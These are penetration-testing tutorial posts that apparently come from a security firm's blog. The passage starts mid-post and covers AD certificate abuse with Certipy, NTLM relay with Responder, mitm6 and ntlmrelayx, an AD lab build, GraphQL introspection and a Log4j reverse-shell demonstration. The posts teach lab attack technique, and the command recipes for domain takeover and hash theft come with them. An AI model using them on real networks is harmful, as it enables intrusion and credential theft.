    After acquiring the new certificate, we can use Certipy to request another certificate, this time a User certificate, for the administrator account.

    certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA IP Address} -template User -on-behalf-of {Domain\Username} -pfx {Saved Certificate}
    Getting Administrator Certificate

    With the certificate for the administrator user, we use certipy to authenticate with the domain, giving us access to the administrator’s password hash.

    certipy auth -pfx {Saved Administrator Certificate} -dc-ip {DC IP Address}
    Authenticating with Administrator Certificate

    At this point we have access to the domain as the domain’s Administrator account. Using the tools we’ve previously learned about like CME, we can take complete control of the domain.

    crackmapexec smb {Target IP Address} -u {Username} -H {Password Hash}
    Spraying hashes using CME

    From this point, we can use the Secretsdump utility to gather user password hashes from the domain, as previously illustrated.

    Exploit 3: ESC4

    Another vulnerable misconfiguration that can occur is if users have too much control over the certificate templates. First we configure a certificate on my test network that gives users complete control over the templates.

    Users have full control of template

    Now we use Certipy to show the vulnerable templates using the same command as we used in the prior exploits.

    certipy find -dc-ip {DC IP Address} -u {Username} -p {Password} -vulnerable
    Vulnerable template

    We can use Certipy to modify the certificate to make it vulnerable to ESC1, which allows a user to supply an arbitrary Subject Alternative Name.

    The first step is to modify the vulnerable template to make it vulnerable to another misconfiguration.

    certipy template -u {Username} -p {Password} -template {Vulnerable Template Name} -save-old target-ip {CA Server IP Address}
    Changing the template

    Note that we can use the save-old flag to save the old configuration. This allows us to restore the template after the exploit.

    After modifying the template, we can request a new certificate specifying that it is for the administrator account. When specifying the new account use the account@domain format.

    certipy req -u {Username} -p {Password} -ca {CA Server Name} -target {CA Server IP Address} -template {Template Name} -upn {Target Username@Domain} -dc-ip {DC IP Address}
    Requesting new certificate

    Before we get too far, it’s a good idea to restore the certificate template.

    certipy template -u {Username} -p {Password} -template {Template Name} -configuration {Saved Template Setting File} -dc-ip {DC IP Address}
    Restoring the Template

    After that we can authenticate with the certificate, again gaining access to the administrator’s hash.

    certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
    Authenticating with certificate
    Exploit 4: Admin Control over CA Server

    Another route to domain privilege escalation is if we have administrator access over the CA server. In the example lab I am just using a domain administrator account, but in a real engagement this access can be gained any number of ways.

    If we have administrator access over the CA server, we can use the certificate to back everything up including the private keys and certificates.

    certipy ca -backup -ca {CA Server Name} -u {Username} -p {Password} -dc-ip {DC IP Address}
    Backing up the CA server

    After backing up the CA server up we can use Certipy to forge a new certificate for the administrator account. In a real engagement the domain information would have to be changed.

    certipy forge -ca-pfx {Name of Backup Certificate} -upn {Username@Domain} -subject 'CN=Administrator,CN=Users,DC={Domain Name},DC={Domain Top Level}'
     Forging new certificate

    After forging the certificate, we can use it to authenticate, again giving us access to the user’s NTLM password hash.

    certipy auth -pfx {Saved Certificate} -dc-ip {DC IP Address}
    Authenticating with forged certificate
    Helpful References

    Want to learn more? Take a look at the next part in our Active Directory Series.

  • AD Series: How to Perform Broadcast Attacks Using NTLMRelayx, MiTM6 and Responder

    Now that we setup an AD test environment in my last post, we’re ready to try out broadcast attacks on our vulnerable test network.

    In this post we will learn how to use tools freely available for use on Kali Linux to:

    • Discover password hashes on the network
    • Pivot to other machines on the network using discovered credentials and hashes
    • Relay connections to other machines to gain access
    • View internal file shares

    For the attacker machine in my lab, I am using Kali Linux. This can be deployed as a virtual machine on the Proxmox server that we setup in my previous post or can be a separate machine as long as the Active Directory network is reachable.

    Most tools we will use are preinstalled on Kali:

    • MiTM6: Download from GitHub
    • Responder: Installed on Kali
    • CrackMapExec: Installed on Kali
    • Ntmlrelayx: Installed on Kali (run using impacket-ntlmrelayx)
    • Proxychains: Installed on Kali
    Setting up the Attack

    Within Kali, first we’ll start MiTM6:

    sudo mitm6 -i {Network Interface}
    sudo mitm6 -i eth1
    
    Starting MiTM6

    MiTM6 will pretend to be a DNS server for a IPv6 network. By default Windows prefers IPv6 over IPv4 networks. Most places don’t utilize the IPv6 network space but don’t have it disabled in their Windows domains. Therefore, by advertising as a IPv6 router and setting the default DNS server to be the attacker, MiTM6 can spoof DNS entries allowing for man in the middle attacks. A note from their GitHub even mentions that it is designed to run with tools like ntlmrelayx and responder.

    Next we start Responder:

    sudo responder -I {Network Interface}
    sudo responder -I eth1
    Starting responder

    Responder will listen for broadcast name resolution requests and will respond to them on its own. It also has multiple servers that will listen for network connections and attempt to get user computers to authenticate with them, providing the attacker with their password hash. There is more to the tool than what is covered in this tutorial, so check it out!

    With MiTM6 and Responder running, next we start CrackMapExec (CME):

    crackmapexec smb {Network} –gen-relay-list {OutFile}
    Starting CrackMapExec

    CME is a useful tool for testing windows computers on the domain. There are many functions within CME that we won’t be discussing in this post, so I definitely recommend taking a deeper look! In this post we are using CME to enumerate SMB servers and whether SMB message signing is required and also to connect to and perform post exploitation activities.

    First we will use CME to find all of the SMB servers on the AD network (10.80.0.0/24) and additionally to find those servers which do not require message signing. It saves those which don’t to the file name relay.lst.

    Now we’re ready to start ntlmrelayx to relay credentials:

    impacket-ntlmrelayx -tf {File Containing Target SMB servers} -smb2support
    impacket-ntlmrelayx -tf relay.lst -smb2support
    Starting ntlmrelayx

    Ntlmrelayx is a tool that listens for incoming connections (mostly SMB and HTTP) and will, when one is received, relay (think forwarding) the connection/authentication to another SMB server. These other SMB servers are those that were found earlier by CME with the –gen-relay-list flag, so we know they don’t require message signing. Note that the smb2support flag just tells ntlmrelayx to setup a SMBv2 server.

    Almost immediately we start getting traffic over HTTP:

    Ntlmrelayx sees traffic
    Running the Attack

    So far the responder, mitm6 and ntlmrelayx screens just show the initial starting of the program. Not much is actually happening in any of them. The CME screen is just showing the usage to gather SMB servers that don’t require message signing.

    To help things along with our demo, we can force one of the computers on the network to attempt to access a share that doesn’t exist.

    Forcing a computer to attempt to access a share that doesn't exist

    While a user looking for a share that doesn’t exist is not needed for this attack, it’s a quick way to skip waiting for an action to occur automatically. Many times on corporate networks, machines will mount shares automatically or users will need a share at some point allowing an attacker to poison the request them. If responder is the first to answer, our attack works, but, if not, the attack doesn’t work in that instance.

    Responder captures and poisons the response so that the computer connects to ntlmrelayx, which is still running in the background.

    Below we see where responder hears the search for “newshare” and responds with a fake/poisoned response saying that the attacker’s machine is in fact the host for “newshare.” This causes the victim machine to connect to ntlmrelayx which then relays the connection to another computer that doesn’t require message signing. We don’t need to see or crack a user password hash since we are just acting as a man in the middle (hence MiTM) and relaying the authentication from an actual user to another machine.

    Responder hears the request and answers with a poisoned response

    In this case the user on the Windows machine who searched for “newshare” turns out to be an administrator over some other machines, particularly the machine that ntlmrelayx relayed their credentials to. This means that ntlmrelayx now has administrator access to that machine.

    The default action when ntlmrelayx has admin rights is to dump the SAM database. The SAM database holds the username and password hashes (NTLM) for local accounts to that computer. Due to how Windows authentication works, having the NTLM hash grants access as if we had the password. This means we can login to this computer at any time as the local administrator WITHOUT cracking the hash. While NTLM hashes are easy to crack, this speeds up our attack.

    If other computers on the network share the same local accounts, we can then login to those computers as the admin as well. We could also use CME to spray the local admin password hash to check for credential reuse. Keep in mind that the rights and access we get to a server all depends on the rights of the user we are pretending to be. In pentests, we often do not start with an admin user and need to find ways to pivot from our initial user to other users with more access until we gain admin access.

    The following screenshot shows ntlmrelayx dumping all of the local SAM password hashes on one device on our test network:

    Ntlmrelayx dumping the local SAM password hashes from the compromised device

    While getting the local account password hashes and and gaining access to new machines is a great attack, ntlmrelayx has more flags and modes that allow for other attacks and access. Let’s continue to explore these.

    Playing around with –interactive

    Ntlmrelayx has a mode that will create new TCP sockets that will allow for an attacker to interact with the created SMB connections after a successful relay. The flag is –interactive.

    Ntlmrelayx using the --interactive flag

    When the relay is successful a new TCP port is opened. We can connect to it with Netcat:

    Connecting to the new TCP port using netcat

    We can now interact with the host and the shares that are accessible to the user who is relayed.

    nc 127.0.0.1 11000
    nc 127.0.0.1 11001
    Commands that allow us to interact with the host now that we have access through netcat
    Playing around with -SOCKS

    With a successful relay ntlmrelayx can create a proxy that we can use with other tools to authenticate to other servers on the network. To use this proxy option ntlmrelayx has the -socks flag.

    Here we use ntlmrelayx with the -socks flag to use the proxy option:

    Starting ntlmrelayx with the -socks flag

    Below we see another user has an SMB connection relayed to an SMB server. With the proxy option ntlmrelayx sets up a proxy listener locally. When a new session is created (i.e. a user’s request is relayed successfully) it is added to the running sessions. Then, by directing other tools to the proxy server from ntlmrelayx, we can use these tools interact with these sessions.

    Using the SOCKS connection to proxy to another SMB server

    In order to use this feature we need to set up our proxychains instance to use the proxy server setup by ntlmrelayx.

    The following screen shows the proxychains configuration file at /etc/proxychains4.conf. Here we can see that, when we use the proxychains program, it is going to look for a socks4 proxy at localhost on port 1080. Proxychains is another powerful tool that can do much more than this. I recommend taking a deeper look.

    The proxychains configuration file at /etc/proxychains4.conf

    Once we have proxychains set up, we can use any program that logs in over SMB. All we need is a user that has an active session. We can view active sessions that we can use to relay by issuing the socks command on ntlmrelayx:

    Socks relay targets

    In this example I have backup.admin session for each of the other 2 computers. Let’s use secretsdump from impacket’s library to gather hashes from the computer.

    Using impacket's secretsdump to gather hashes from the computer

    When the program asks for a password we can supply any text at all, as ntlmrelayx will handle the authentication for us and dump the hashes.

    Dumping the local hashes using secretsdump

    Since I am using a private test lab, the password for backup.admin is “Password2.” Here is an example of logging in with smbclient using the correct password:

    Viewing SMB shares as the user would with the smbclient command and their password

    Using proxychains to proxy the request through ntlmrelayx, we can submit the wrong password and still login successfully to see the same information:

    Viewing proxychains without the password to obtain the same view as above
    Next Steps

    All of the tools we discussed are very powerful, and this is just a sampling of what they can be used for. At Raxis we use these tools on most internal network tests. If you’re interested in a pentesting career, I highly recommend that you take a deeper look at them after performing the examples in this tutorial.

    I hope you’ll join me next time when I discuss Active Directory Certificate Services and how to exploit them in our test AD environment.

    Want to learn more? Take a look at the next part in our Active Directory Series.

  • How to Create an AD Test Environment

    Lead Pentester Andrew Trexler walks us through creating a simple AD environment.

    Whether you use the environment to test new hacks before trying them on a pentest, or you use it while learning to pentest and study for the OSCP exam, it is a useful tool to have in your arsenal.

    The Basics

    Today we’ll go through the steps to set up a Windows Active Directory test environment using Proxmox to virtualize the computers. In the end, we’ll have a total of three connected systems, one Domain Controller and two other computers joined to the domain.

    Setting up the Domain Controller (DC)

    The first step is to setup a new virtualized network that will contain the Windows Active Directory environment. Select your virtualization server on the left:

    Select virtual server

    This is a Windows based environment, but we’re using a Linux hypervisor to handle the underlying network architecture, so under System, select Network, and then create a Linux Bridge, as shown in Figures 2 and 3:

    Create a Linux Bridge
    Creating a new network

    After setting up the network, we provision a new virtual machine where we will install Windows 2019 Server. Figure 4 shows the final configuration of the provisioned machine:

    Provisioning Windows Server

    The next step is to install Windows 2019 Server. While installing the operating system make sure to install the Desktop Experience version of the operating system. This will make sure a GUI is installed, making it easier to configure the system.

    Fresh Install of Windows 2019

    Now that we have a fresh install, the next step is to configure the domain controller with a static IP address. This will allow the server to function as the DHCP server. Also make sure to set the same IP as the DNS server since the system will be configured later as the domain’s DNS server.

    Configure Static IP Address

    In order to make things easier to follow and understand later, let’s rename the computer to DC1 since it will be acting as our domain controller on the Active Directory domain.

    Renaming to DC1

    Next, configure the system as a domain controller by using the Add Roles and Features Wizard to add the Active Directory Domain Services and DNS Server roles. This configuration will allow the server to fulfill the roles of a domain controller and DNS server.

    Adding Required Features

    After the roles are installed, we can configure the server and provision the new Active Directory environment. In this lab we will use the domain ad.lab. Other than creating a new forest and setting the name, the default options will be fine.

    Setting up the Domain
    Setting Up the DHCP Service

    The next step is to configure the DHCP service. Here we are using a portion of the 10.80.0.0/24 network space, leaving enough addresses available to accommodate static IP addressing where necessary.

    Setting up DHCP Service

    There is no need for any exclusions on the network, and we will set the lease to be valid for an entire year.

    Adding a Domain Administrator and Users

    Additional configuration is now required within the domain. Let’s add a new domain administrator and some new domain users. Their names and passwords can be anything you want, just make sure to remember them.

    Choosing Option to Add new User

    First we create the Domain Administrator (DA):

    Adding New Administrator Account
    Adding User to Domain Admins

    Here we also make this user an Enterprise Admin (EA) by adding them to the Enterprise Admins group:

    Add User to Enterprise Admins

    Next we will add a normal user to the domain:

    Adding a normal user
    Creating Windows PC

    At this point we should have a functional Active Directory domain with active DHCP and DNS services. Next, we will setup and configure two other Windows 10 machines and join them to the domain.

    The first step is to provision the resources on the Proxmox server. Since our test environment requires only moderate resources, we will only provision the machines with two processor cores and two gigabytes of RAM.

    Provisioned Resources for Windows 10

    Then we install Windows 10 using the default settings. Once Windows is installed, we can open the Settings page and join the system to the ad.lab domain, changing the computer name to something easy to remember if called for.

    Joining the ad.lab domain

    Adding the system to the domain will require us to enter a domain admin’s password. After a reboot we should be able to login with a domain user’s account.

    Seeing the Raxis user from the Ad.lab domain
    SMB Share

    At this point, there should be three computers joined to the Active Directory domain. Using CrackMapExec, we can see the SMB server running on the domain controller but no other systems are visible via SMB. So let’s add a new network share. Open Explorer.exe, select Advance Sharing, and share the C drive.

    I don’t recommend sharing the entire drive in an environment not used for testing, as it’s not secure: the entire contents of the machine would be visible. Since this is a pentest lab environment, though, this is exactly what we are looking for.

    Creating new share

    Creating the share resulted in the system exposing the SMB service to the network. In Figure 20 we verified this by using CrackMapExec to enumerate the two SMB servers:

    CrackMapExec Showing Two SMB servers
    Conclusion

    At this point, our environment should be provisioned, and we are ready to test out different AD test cases, attacks, and other shenanigans. This environment is a great tool for ethically learning different exploits and refining pentesting techniques. Using a virtual infrastructure such as this also provides rollback capability for running multiple test cases with minimal downtime.

    I hope you’ll come back to see my next posts in this series, which will show how to use this environment to test common exploits that we find during penetration testing.

    Want to learn more? Take a look at the next part in our Active Directory Series.

  • Exploiting GraphQL

    GraphQL is a query language inspired by the structure and functionality of online data storage and collaboration platforms Meta, Instagram, and Google Sheets. This post will show you how to take advantage of one of its soft spots.

    Development

    Facebook developed GraphQL in 2012 and then it became open source in 2015. It’s designed to let application query data and functionality be stored in a database or API without having to know the internal structure or functionality. It makes use of the structural information exchanged between the source and the engine to perform query optimization, such as removing redundancy and including only the information that is relevant to the current operation.

    To use GraphQL, since it is a query language (meaning you have to know how to code with it), many opt to use a platform to do the hard work. Companies like the New York Times, PayPal, and even Netflix have dipped into the GraphQL playing field by using Apollo.

    Apollo

    Apollo Server is an open-source, spec-compliant tool that’s compatible with any GraphQL client. It builds a production-ready, self-documenting GraphQL API that can use data from any source.

    Apollo GraphQL has three primary tools and is well documented.

    • Client: A client-side library that helps you digest a GraphQL API along with caching the data that’s received.
    • Server: A library that connects your GraphQL Schema to a server. Its job is to communicate with the backend to send back responses based off the request of the client.
    • Engine: Tracks errors, gathers stats, and performs other monitoring tasks between the Apollo client and the Apollo server.

    (We now understand that GraphQL is query language and Apollo is spec-compliant GraphQL server.)

    A pentester’s perspective

    What could be better than fresh, new, and developing technology? Apollo seems to be the king of the hill, but the issue here is the development of Apollo’s environment is dynamic and fast. Its popularity is growing along with GraphQL, and there seems to be no real competition on the horizon, so it’s not surprising to see more and more implementations. The most difficult part for developers is having proper access controls for each request and implementing a resolver that can integrate with the access controls. Another key point is the constant new build releases with new bugs.

    Introspection

    Batch attacks, SQLi, and debugging operations that disclose information are known vulnerabilities when implementing GraphQL. This post will focus on Introspection.

    Introspection enables you to query a GraphQL server for information about the schema it uses. We are talking fields, queries, types, and so on. Introspection  is mainly for discovery and as a diagnostic tool during the development phase. In a production system you usually don’t want just anyone knowing how to run queries against sensitive data. When they do, they can take advantage of this power. For example, the following field contains interesting information that can be queried by anyone on a GraphQL API in a production system with introspection enabled:

    Information that can be gathered when querying a GraphQL API
    Let’s try it

    One can obtain this level of information in a few ways. One way is to use Burp Suite and the GraphQL Raider plugin. This plugin allows you to isolate the query statement and experiment on the queries. For example, intercepting a post request for “/graphql”, you may see a query in the body, as shown below:

    Burp intercept of webpage communication showing the query that is being sent to the server, which indicates that GraphQL is in use

    Using Burp Repeater with GraphQL we can change the query located in the body and execute an Introspection query for ‘name’ and see the response.

    Knowing GraphQL is in use, we use Burp Extension GraphQL Raider to focus just on queries. Here we are requesting field names in this standard GraphQL request, but this can be changed to a number of combinations for more results once a baseline is confirmed.

    Knowing GraphQL is in use, we use Burp Extension GraphQL Raider to focus just on queries. Here we are requesting field names in this standard GraphQL request, but this can be changed to a number of combinations for more results once a baseline is confirmed.

    This request is checking the ‘schema’ for all ‘types’ by ‘name’ . This is the response to that query on the right.

    This request is checking the ‘schema’ for all ‘types’ by ‘name’ . This is the response to that query on the right.

    Looking further into the response received, we see a response “name”: “allUsers”. Essentially what is happening is we are asking the server to please provide information that has “name” in it. The response gave a large result, and we spot “allUsers”. If we queried that specific field, it would likely provide all the users.

    Looking further into the response received, we see a response “name”: “allUsers”. Essentially what is happening is we are asking the server to please provide information that has “name” in it. The response gave a large result, and we spot “allUsers”. If we queried that specific field, it would likely provide all the users.

    The alternative would be to use CURL. You can perform the same actions simply by placing the information in a curl statement. So the same request as above translated over for Curl would be similar to:

    Curl statement requesting a POST with an application header for a specific URL with data request using the GraphQl query. Specifically, this query is communicating with the schema types and getting field names.

    You could opt to do this in the browser address bar as well, but that can be temperamental at times. So you can see how easy it is to start unraveling the treasure trove of information all without any authentication.

    Even more concerning are the descriptive errors the system provides that can help a malicious attacker succeed. Here we use different curl statement to the server. This is the same request except that the query is for “system.”

    This is the same request except that the query is for “system.”

    When the request cannot be fulfilled, the server tries its best to recommend a legitimate field request. This allows the malicious attacker to formulate and build statements one error at a time if needed:

    This is a verbose response received from GraphQL that actually recommends an appropriate query if yours isn’t correct.

    Pentest ToolBox

    Ethical hackers would be wise to add this full request to their toolbox as it should provide a full request that provides a long list of objects, fields, mutations, descriptions, and more:

    {__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

    Ethical hackers, may want to add these to their directory brute force attacks as well:

    • /graphql
    • /graphiql
    • /graphql.php
    • /graphql/console
    Conclusion

    Having GraphQL introspection in production might expose sensitive information and expand the attack surface. Best practice recommends disabling introspection in production unless there is a specific use case. Even in this case, consider allowing introspection only for authorized requests, and use a defensive in-depth approach.

    You can turn off introspection in production by setting the value of the introspection config key on your Apollo Server instance.

    This is the proper configuration in a production system to turn off Introspection on a new Apollo server.

    Although this post only addresses Introspection, GraphQL/Apollo is still known to be vulnerable to the attacks I mentioned at the beginning – batch attacks, SQLi, and debugging operations that disclose information – and we will address those in subsequent posts. However, the easiest and most common attack vector is Introspection. Fortunately, it comes with an equally simple remedy: Turn it off.

     

  • Log4j: How to Exploit and Test this Critical Vulnerability

    UPDATE: On November 16, the Cybersecurity and Infrastructure Security Agency (CISA) announced that government-sponsored actors from Iran used the Log4j vulnerability to compromise a federal network, deploy Crypto Miner and Credential Harvester.

    In this article Raxis, a top tier provider in cybersecurity penetration testing, demonstrates how a remote shell can be obtained on a target system using a Log4j open source exploit that is available to anyone.

    Introduction

    This critical vulnerability, labeled CVE-2021-44228, affects a large number of customers, as the Apache Log4j component is widely used in both commercial and open source software. In addition, ransomware attackers are weaponizing the Log4j exploit to increase their reach to more victims across the globe.

    Our demonstration is provided for educational purposes to a more technical audience with the goal of providing more awareness around how this exploit works. Raxis believes that a better understanding of the composition of exploits it the best way for users to learn how to combat the growing threats on the internet.

    Log4j Exploit Storyboard

    The Apache Log4j vulnerability, CVE-2021-44228 (https://nvd.nist.gov/vuln/detail/CVE-2021-44228), affects a large number of systems, and attackers are currently exploiting this vulnerability for internet-connected systems across the world. To demonstrate the anatomy of such an attack, Raxis provides a step-by-step demonstration of the exploit in action.  Within our demonstration, we make assumptions about the network environment used for the victim server that would allow this attack to take place.  There are certainly many ways to prevent this attack from succeeding, such as using more secure firewall configurations or other advanced network security devices, however we selected a common “default” security configuration for purposes of demonstrating this attack.

    Victim Server

    First, our victim server is a Tomcat 8 web server that uses a vulnerable version of Apache Log4j and is configured and installed within a docker container. The docker container allows us to demonstrate a separate environment for the victim server that is isolated from our test environment. Our Tomcat server is hosting a sample website obtainable from https://github.com/cyberxml/log4j-poc and is configured to expose port 8080 for the vulnerable web server. No other inbound ports for this docker container are exposed other than 8080. The docker container does permit outbound traffic, similar to the default configuration of many server networks.

    Note, this particular GitHub repository also featured a built-in version of the Log4j attack code and payload, however, we disabled it for our example in order to provide a view into the screens as seen by an attacker. We are only using the Tomcat 8 web server portions, as shown in the screenshot below.

    Victim Tomcat 8 Demo Web Server Running Code Vulnerable to the Log4j Exploit

    Next, we need to setup the attacker’s workstation. Using exploit code from https://github.com/kozmer/log4j-shell-poc, Raxis configures three terminal sessions, called Netcat Listener, Python Web Server, and Exploit, as shown below.

    Netcat Listener, Port 9001

    The Netcat Listener session, indicated in Figure 2, is a Netcat listener running on port 9001. This session is to catch the shell that will be passed to us from the victim server via the exploit.

    Attacker’s Netcat Listener on Port 9001
    Python Web Server, Port 80

    The Python Web Server session in Figure 3 is a Python web server running on port 80 to distribute the payload to the victim server.

    Attacker’s Python Web Server to Distribute Payload
    Exploit Code, Port 1389

    The Exploit session, shown in Figure 4, is the proof-of-concept Log4j exploit code operating on port 1389, creating a weaponized LDAP server. This code will redirect the victim server to download and execute a Java class that is obtained from our Python Web Server running on port 80 above. The Java class is configured to spawn a shell to port 9001, which is our Netcat listener in Figure 2.

    Attacker’s Log4J Exploit Code
    Execute the Attack

    Now that the code is staged, it’s time to execute our attack. We’ll connect to the victim webserver using a Chrome web browser. Our attack string, shown in Figure 5, exploits JNDI to make an LDAP query to the Attacker’s Exploit session running on port 1389.  

    Victim’s Website and Attack String

    The attack string exploits a vulnerability in Log4j and requests that a lookup be performed against the attacker’s weaponized LDAP server. To do this, an outbound request is made from the victim server to the attacker’s system on port 1389. The Exploit session in Figure 6 indicates the receipt of the inbound LDAP connection and redirection made to our Attacker’s Python Web Server. 

    Attacker’s Exploit Session Indicating Inbound Connection and Redirect

    The Exploit session has sent a redirect to our Python Web Server, which is serving up a weaponized Java class that contains code to open up a shell. This Java class was actually configured from our Exploit session and is only being served on port 80 by the Python Web Server. The connection log is show in Figure 7 below.

    Attacker’s Python Web Server Sending the Java Shell

    The last step in our attack is where Raxis obtains the shell with control of the victim’s server. The Java class sent to our victim contained code that opened a remote shell to our attacker’s netcat session, as shown in Figure 8. The attacker now has full control of the Tomcat 8 server, although limited to the docker session that we had configured in this test scenario. 

    Attacker’s Access to Shell Controlling Victim’s Server
    Conclusion

    As we’ve demonstrated, the Log4j vulnerability is a multi-step process that can be executed once you have the right pieces in place. Raxis is seeing this code implemented into ransomware attack bots that are searching the internet for systems to exploit. This is certainly a critical issue that needs to be addressed as soon as possible, as it is a matter of time before an attacker reaches an exposed system.